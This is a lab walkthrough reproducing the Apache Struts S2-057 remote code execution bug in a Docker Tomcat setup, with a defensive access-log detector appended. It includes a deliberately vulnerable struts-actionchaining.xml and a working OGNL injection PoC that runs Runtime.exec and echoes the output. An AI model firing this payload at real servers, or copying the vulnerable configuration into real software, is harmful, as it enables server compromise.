S2-057 remote code execution vulnerability: reproduction walkthrough
0x01 Set up the environment with Docker
https://github.com/vulhub/vulhub/tree/master/struts2/s2-048
docker-compose up -d
0x02 Build the S2-057 vulnerable environment
docker exec -i -t 88fd8d560155 /bin/bash
The container is started in the background; the command above opens a shell inside it.
According to the release announcement at https://struts.apache.org/releases.html:
Release           Release Date        Vulnerability     Notes
Struts 2.5.16     16 March 2018       S2-057            Version notes
Struts 2.5.14.1   30 November 2017                      Version notes
Struts 2.5.14     23 November 2017    S2-055, S2-054    Version notes
Struts 2.5.16 is affected by S2-057, so download that version:
https://fossies.org/linux/www/legacy/struts-2.5.16-all.zip/
apt-get update -y
mkdir /usr/local/tomcat/webapps/test
cd /usr/local/tomcat/webapps/test
wget https://fossies.org/linux/www/legacy/struts-2.5.16-all.zip
apt-get install unzip -y
unzip struts-2.5.16-all.zip
# the showcase war ships in the apps/ directory of the extracted distribution
cp struts-2.5.16/apps/struts2-showcase.war /usr/local/tomcat/webapps/
0x03 Modify the configuration file
First locate struts-actionchaining.xml; there are two places that need to be modified.
root@88fd8d560155:/usr/local/tomcat/webapps/test# locate struts-actionchaining.xml
/usr/local/tomcat/webapps/struts2-showcase/WEB-INF/classes/struts-actionchaining.xml
/usr/local/tomcat/webapps/struts2-showcase/WEB-INF/src/java/struts-actionchaining.xml
/usr/local/tomcat/webapps/test/struts-2.5.16/src/apps/showcase/src/main/resources/struts-actionchaining.xml
root@88fd8d560155:/usr/local/tomcat/webapps/test#
Reference for the configuration change: https://lgtm.com/blog/apache_struts_CVE-2018-11776
Change it to the following (the package declares no namespace and the redirectAction result names only the target action, which is the condition S2-057 depends on):
<struts>
    <package name="actionchaining" extends="struts-default">
        <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
            <result type="redirectAction">
                <param name="actionName">register2</param>
            </result>
        </action>
    </package>
</struts>
Then go to the bin directory and stop the process: because the configuration file was changed, the service has to be restarted.
root@88fd8d560155:/usr/local/tomcat/bin# cd /usr/local/tomcat/bin/
root@88fd8d560155:/usr/local/tomcat/bin# ls
bootstrap.jar  catalina.sh  commons-daemon.jar  daemon.sh  setclasspath.sh  startup.sh  tool-wrapper.sh
catalina-tasks.xml  commons-daemon-native.tar.gz  configtest.sh  digest.sh  shutdown.sh  tomcat-juli.jar  version.sh
root@88fd8d560155:/usr/local/tomcat/bin# ./shutdown.sh
0x04 Restart the service; the S2-057 environment is ready
root@HK ~/vulhub/struts2/s2-048 master ● docker-compose up -d
Starting s2-048_struts2_1 ... done
root@HK ~/vulhub/struts2/s2-048 master ●
0x05 Verify S2-057
Docker target: http://www.canyouseeme.cc:8080/struts2-showcase/
Command execution test (the OGNL expression is placed in the namespace segment of the URL path): http://www.canyouseeme.cc:8080/struts2-showcase/${(111+111)}/actionChain1.action
${(111+111)}
The evaluated result is returned in the redirect URL: http://www.canyouseeme.cc:8080/struts2-showcase/222/register2.action
PS: ${(111+111)} can be replaced with an earlier PoC, for example the one from S2-032.
http://www.canyouseeme.cc:8080/struts2-showcase/%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27calc%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew++java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read(%23d)%2c%23jas502n%3d+%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23jas502n.println(%23d+)%2c%23jas502n.close())%7d/actionChain1.action
PoC example:
${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('calc').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#jas502n.println(#d),#jas502n.close())}
Broken down:
${
  (
    #_memberAccess["allowStaticMethodAccess"]=true,
    #a=@java.lang.Runtime@getRuntime().exec('calc').getInputStream(),
    #b=new java.io.InputStreamReader(#a),
    #c=new java.io.BufferedReader(#b),
    #d=new char[51020],
    #c.read(#d),
    #jas502n=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),
    #jas502n.println(#d),
    #jas502n.close()
  )
}
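On the defender's side, the distinguishing feature of both requests above (the arithmetic probe and the full PoC) is an OGNL expression delimiter sitting in a path segment in front of the action name. The following detector, an added example that is not part of the original post, walks Tomcat-style access-log lines, percent-decodes the request path (repeatedly, so double-encoded payloads are not missed), ignores the query string, and grades each hit as a probe or an attempted code execution. The log lines are constructed for the example, and the log-line regex and the token list (taken from the PoC on this page) are the example's own assumptions, not a vendor rule.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Tomcat's common access-log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Aug/2018:10:01:02 +0000] "GET /struts2-showcase/index.action HTTP/1.1" 200 5120
10.0.0.7 - - [22/Aug/2018:10:01:09 +0000] "GET /struts2-showcase/${(111+111)}/actionChain1.action HTTP/1.1" 302 0
10.0.0.7 - - [22/Aug/2018:10:01:10 +0000] "GET /struts2-showcase/222/register2.action HTTP/1.1" 200 1024
10.0.0.9 - - [22/Aug/2018:10:02:31 +0000] "GET /struts2-showcase/%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue)%7d/actionChain1.action HTTP/1.1" 302 0
10.0.0.11 - - [22/Aug/2018:10:03:00 +0000] "GET /struts2-showcase/search.action?q=%24%7b1%7d HTTP/1.1" 200 800
"""

# Assumed log layout: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# OGNL expression delimiters ("${" and "%{") have no business in a URL path segment.
EXPR_RE = re.compile(r"[$%]\{")

# Tokens from the PoC above that turn an arithmetic probe into an attempted code execution.
RCE_TOKENS = ("#_memberAccess", "@java.lang.Runtime@", "ServletActionContext")


def fully_decode(s, rounds=3):
    """Percent-decode until stable (bounded) so double-encoded payloads are also seen."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_path(target):
    """Return None, 'ognl-probe' or 'ognl-rce-attempt' for one request target.

    Only the path is inspected: S2-057 injects into the namespace segment of the
    path, so an expression that appears solely in the query string is not this bug.
    """
    path = fully_decode(target.split("?", 1)[0])
    if not EXPR_RE.search(path):
        return None
    if any(token in path for token in RCE_TOKENS):
        return "ognl-rce-attempt"
    return "ognl-probe"


def scan_access_log(text):
    """Yield one finding dict per suspicious request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        verdict = classify_path(m["target"])
        if verdict:
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": m["status"],
                "verdict": verdict,
                "path": fully_decode(m["target"]),
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['verdict']:17} {f['ip']:10} {f['status']} {f['path']}")
```

A 302 on the injected request followed by a request for a redirect target whose first segment is the evaluated value (here 222) is the same two-step pattern the walkthrough shows in the browser, so correlating consecutive lines from one client is a useful second signal alongside the per-request verdict.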
0x06 References
https://github.com/vulhub/vulhub/tree/master/struts2/s2-048
https://lgtm.com/blog/apache_struts_CVE-2018-11776
https://cwiki.apache.org/confluence/display/WW/S2-057
https://www.anquanke.com/post/id/157518